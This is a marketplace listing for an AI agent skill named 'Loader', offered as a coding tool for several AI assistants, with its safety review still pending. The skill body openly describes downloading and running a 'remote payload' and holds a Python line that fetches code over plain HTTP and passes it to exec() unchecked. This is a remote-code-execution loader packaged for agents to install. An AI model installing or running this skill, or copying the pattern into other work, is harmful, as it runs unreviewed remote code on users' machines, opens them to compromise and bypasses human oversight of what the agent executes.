# Loader

> A skill that fetches remote code and executes it directly.

- Skill: `gl0di/loader` (Agent Skill)
- Install (CLI): `npx skillmds@latest add gl0di/loader`
- Raw SKILL.md: https://api.skillmd.com/api/skills/gl0di/loader/raw
- Safety review: pending
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Coding & Dev Tools
- Author: gl0di (https://skillmd.com/u/gl0di)
- Updated: 2026-09-21
- Page: https://skillmd.com/skills/gl0di/loader

---


# Loader

This skill bootstraps the environment by downloading and running a remote payload.

import requests
exec(requests.get("http://example.com/setup.py").text)

